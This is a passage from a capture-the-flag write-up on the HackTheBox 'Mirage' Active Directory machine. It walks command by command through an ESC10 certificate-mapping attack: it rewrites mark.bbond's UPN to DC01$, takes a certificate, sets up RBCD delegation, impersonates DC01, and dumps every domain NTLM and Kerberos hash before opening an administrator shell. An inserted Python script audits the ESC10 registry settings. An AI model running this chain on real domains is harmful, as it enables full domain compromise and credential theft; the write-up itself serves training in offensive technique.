    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MIRAGE.HTB\Administrators
      Access Rights
        ManageCa                        : MIRAGE.HTB\Administrators
                                          MIRAGE.HTB\Domain Admins
                                          MIRAGE.HTB\Enterprise Admins
        ManageCertificates              : MIRAGE.HTB\Administrators
                                          MIRAGE.HTB\Domain Admins
                                          MIRAGE.HTB\Enterprise Admins
        Enroll                          : MIRAGE.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates

We see that mirage-service has WRITE permission over mark.bbond.

KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)"  /usr/bin/bloodyAD --host DC01.mirage.htb -u mirage-service$ -k get writable

distinguishedName: CN=TPM Devices,DC=mirage,DC=htb
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
permission: WRITE

Digging further into the attributes, we see that userPrincipalName is listed as WRITE.

KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" bloodyAD --host DC01.mirage.htb -u mirage-service$ -k get writable --detail

# [... cut ..]

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
manager: WRITE
mail: WRITE
msDS-HABSeniorityIndex: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SourceObjectDN: WRITE
msDS-AllowedToDelegateTo: WRITE
altSecurityIdentities: WRITE
servicePrincipalName: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
otherMailbox: WRITE
showInAddressBook: WRITE
systemFlags: WRITE
division: WRITE
objectGUID: WRITE
name: WRITE
displayNamePrintable: WRITE
proxyAddresses: WRITE
company: WRITE
department: WRITE
co: WRITE
dn: WRITE
initials: WRITE
givenName: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
sn: WRITE
objectCategory: WRITE
cn: WRITE
objectClass: WRITE

ESC10

Certipy's documentation describes several scenarios in which userPrincipalName is used to abuse vulnerable templates (ESCx). However, most of those would already show up in certipy's output.

One of those scenarios is ESC10, which requires modifying a user's UPN (mark.bbond) and a CertificateMappingMethods value of 0x4 under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\ registry key; the latter was confirmed by querying the registry.

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\ 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\CipherSuites
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Note that certipy cannot detect ESC10, since privileged access is required to read those registry keys.

Certipy does not directly detect ESC10 by querying the Schannel CertificateMappingMethods registry key on Domain Controllers or other target servers, as this typically requires privileged access (like local administrator rights) to those servers’ registries.
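Because the check needs registry access on the DC, it is something a defender runs locally or over remote management rather than from certipy. The following added example (not the author's or Certipy's code) parses reg query output like the one shown and flags the UPN mapping bit; it also covers the other ESC10 variant Certipy documents, StrongCertificateBindingEnforcement set to 0 under the Kdc key, which this write-up does not touch. All sample outputs are constructed, with the 0x4 value taken from DC01.

```python
"""Audit the Schannel / KDC registry values behind ESC10 from 'reg query' output.

Added example, not code from the original write-up or from Certipy. It parses
the text 'reg query' prints, as shown in the write-up, and reports the two
conditions Certipy's ESC10 description relies on: CertificateMappingMethods
including the UPN bit 0x4, and StrongCertificateBindingEnforcement set to 0.
Sample outputs below are constructed; 0x4 is the value observed on DC01.
"""
import re

SCHANNEL_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL"
KDC_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc"

# Bits of CertificateMappingMethods (Schannel). 0x18 is the default since KB5014754.
MAPPING_METHOD_BITS = {
    0x1: "Subject/Issuer",
    0x2: "Issuer",
    0x4: "UPN",
    0x8: "S4U2Self",
    0x10: "S4U2Self explicit",
}
HARDENED_MAPPING_METHODS = 0x18

# Constructed: the SCHANNEL query as shown in the write-up (0x4 = UPN mapping only).
DC01_SCHANNEL_OUTPUT = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Ciphers
"""
# Constructed: a hardened host, for comparison.
HARDENED_SCHANNEL_OUTPUT = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x18
"""
# Constructed: Kdc key with strong certificate binding disabled (ESC10 case 1).
WEAK_KDC_OUTPUT = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Kdc
    StrongCertificateBindingEnforcement    REG_DWORD    0x0
"""

# Indented value lines: "<name>    REG_<type>    <data>"
_VALUE_RE = re.compile(r"^\s+(\S+)\s+REG_(DWORD|QWORD|SZ|EXPAND_SZ|BINARY)\s+(.*?)\s*$")


def parse_reg_query(output: str) -> dict[str, dict[str, str]]:
    """Map each key path in 'reg query' output to its {value name: raw data}."""
    keys: dict[str, dict[str, str]] = {}
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line.startswith((" ", "\t")):  # unindented lines are key paths
            current = line.strip()
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(3)
    return keys


def decode_mapping_methods(value: int) -> list[str]:
    """Names of the mapping methods enabled in a CertificateMappingMethods value."""
    return [name for bit, name in MAPPING_METHOD_BITS.items() if value & bit]


def assess_esc10(schannel_output: str, kdc_output: str = "") -> list[str]:
    """Return ESC10-relevant findings; an empty list means neither condition is present."""
    findings: list[str] = []
    schannel = parse_reg_query(schannel_output).get(SCHANNEL_KEY, {})
    raw = schannel.get("CertificateMappingMethods")
    if raw is not None:
        value = int(raw, 0)  # accepts the 0x-prefixed form reg query prints
        if value & 0x4:
            findings.append(
                f"CertificateMappingMethods={value:#x} enables UPN mapping "
                f"({', '.join(decode_mapping_methods(value))}): Schannel maps a "
                f"certificate to an account by its UPN (ESC10 case 2); "
                f"recommended value {HARDENED_MAPPING_METHODS:#x}"
            )
    kdc = parse_reg_query(kdc_output).get(KDC_KEY, {})
    raw = kdc.get("StrongCertificateBindingEnforcement")
    if raw is not None and int(raw, 0) == 0:
        findings.append("StrongCertificateBindingEnforcement=0 disables strong "
                        "certificate mapping on the KDC (ESC10 case 1)")
    return findings


if __name__ == "__main__":
    for finding in assess_esc10(DC01_SCHANNEL_OUTPUT, WEAK_KDC_OUTPUT):
        print("[!]", finding)
    print("hardened host:", assess_esc10(HARDENED_SCHANNEL_OUTPUT) or "no ESC10 conditions")
```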

Exploit

We start by changing mark.bbond's userPrincipalName to DC01$, acting as mirage-service.

KRB5CCNAME='mirage-service$.ccache' faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad account update -user 'mark.bbond' -upn 'DC01$@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
    userPrincipalName                   : DC01$@mirage.htb
[*] Successfully updated 'mark.bbond'

As mark.bbond we obtain a certificate from the User template.

KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad req -k -dc-ip 10.10.11.78 -target dc01.mirage.htb -ca mirage-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'DC01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'

We restore mark.bbond's original UPN value.

KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad account update -user 'mark.bbond' -upn 'mark.bbond@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
    userPrincipalName                   : mark.bbond@mirage.htb
[*] Successfully updated 'mark.bbond'

With the certificate obtained we authenticate and get an LDAP "shell", where we configure RBCD. The syntax is: set_rbcd Target Controlled-Account.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'DC01$@mirage.htb'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# set_rbcd DC01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on DC01$ via S4U2Proxy

# exit
Bye!

We request a service ticket for mirage-service, specifying -impersonate DC01.

KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate DC01 -dc-ip 10.10.11.78 'mirage.htb/mirage-Service$' -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating DC01
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache

Finally, with this last ticket we obtain the administrator hash.

KRB5CCNAME=DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass DC01.mirage.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
[*] Cleaning up... 

Shell

We request a ticket with the hash.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/administrator -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache

We get a shell as administrator and read the root.txt flag.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
mirage\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
9342842359559823b3082c946f8d4e14
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Dump Hashes

We dump the hashes with impacket-secretsdump.

KRB5CCNAME=DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass DC01.mirage.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
mirage.htb\javier.mmarshall:1108:aad3b435b51404eeaad3b435b51404ee:694fba7016ea1abd4f36d188b3983d84:::
mirage.htb\mark.bbond:1109:aad3b435b51404eeaad3b435b51404ee:8fe1f7f9e9148b3bdeb368f9ff7645eb:::
mirage.htb\nathan.aadam:1110:aad3b435b51404eeaad3b435b51404ee:1cdd3c6d19586fd3a8120b89571a04eb:::
mirage.htb\svc_mirage:2604:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b5b26ce83b5ad77439042fbf9246c86c:::
Mirage-Service$:1112:aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
krbtgt:aes256-cts-hmac-sha1-96:95f7af8ea1bae174de9666c99a9b9edeac0ca15e70c7246cab3f83047c059603
krbtgt:aes128-cts-hmac-sha1-96:6f790222a7ee5ba9d2776f6ee71d1bfb
krbtgt:des-cbc-md5:8cd65e54d343ba25
mirage.htb\Dev_Account_A:aes256-cts-hmac-sha1-96:e4a6658ff9ee0d2a097864d6e89218287691bf905680e0078a8e41498f33fd9a
mirage.htb\Dev_Account_A:aes128-cts-hmac-sha1-96:ceee67c4feca95b946e78d89cb8b4c15
mirage.htb\Dev_Account_A:des-cbc-md5:26dce5389b921a52
mirage.htb\Dev_Account_B:aes256-cts-hmac-sha1-96:5c320d4bef414f6a202523adfe2ef75526ff4fc6f943aaa0833a50d102f7a95d
mirage.htb\Dev_Account_B:aes128-cts-hmac-sha1-96:e05bdceb6b470755cd01fab2f526b6c0
mirage.htb\Dev_Account_B:des-cbc-md5:e5d07f57e926ecda
mirage.htb\david.jjackson:aes256-cts-hmac-sha1-96:3480514043b05841ecf08dfbf33d81d361e51a6d03ff0c3f6d51bfec7f09dbdb
mirage.htb\david.jjackson:aes128-cts-hmac-sha1-96:bd841caf9cd85366d254cd855e61cd5e
mirage.htb\david.jjackson:des-cbc-md5:76ef68d529459bbc
mirage.htb\javier.mmarshall:aes256-cts-hmac-sha1-96:20acfd56be43c1123b3428afa66bb504a9b32d87c3269277e6c917bf0e425502
mirage.htb\javier.mmarshall:aes128-cts-hmac-sha1-96:9d2fc7611e15be6fe16538ebb3b2ad6a
mirage.htb\javier.mmarshall:des-cbc-md5:6b3d51897fdc3237
mirage.htb\mark.bbond:aes256-cts-hmac-sha1-96:dc423caaf884bb869368859c59779a757ff38a88bdf4197a4a284b599531cd27
mirage.htb\mark.bbond:aes128-cts-hmac-sha1-96:78fcb9736fbafe245c7b52e72339165d
mirage.htb\mark.bbond:des-cbc-md5:d929fb462ae361a7
mirage.htb\nathan.aadam:aes256-cts-hmac-sha1-96:b536033ac796c7047bcfd47c94e315aea1576a97ff371e2be2e0250cce64375b
mirage.htb\nathan.aadam:aes128-cts-hmac-sha1-96:b1097eb42fd74827c6d8102a657e28ff
mirage.htb\nathan.aadam:des-cbc-md5:5137a74f40f483c7
mirage.htb\svc_mirage:aes256-cts-hmac-sha1-96:937efa5352253096b3b2e1d31a9f378f422d9e357a5d4b3af0d260ba1320ba5e
mirage.htb\svc_mirage:aes128-cts-hmac-sha1-96:8d382d597b707379a254c60b85574ab1
mirage.htb\svc_mirage:des-cbc-md5:2f13c12f9d5d6708
DC01$:aes256-cts-hmac-sha1-96:4a85665cd877c7b5179c508e5bc4bad63eafe514f7cedb0543930431ef1e422b
DC01$:aes128-cts-hmac-sha1-96:94aa2a6d9e156b7e8c03a9aad4af2cc1
DC01$:des-cbc-md5:cb19ce2c733b3ba8
Mirage-Service$:aes256-cts-hmac-sha1-96:80bada65a4f84fb9006013e332105db15ac6f07cb9987705e462d9491c0482ae
Mirage-Service$:aes128-cts-hmac-sha1-96:ff1d75e3a88082f3dffbb2b8e3ff17dd
Mirage-Service$:des-cbc-md5:c42ffd455b91f208
[*] Cleaning up... 

Dany Sucuc
WRITTEN BY
sckull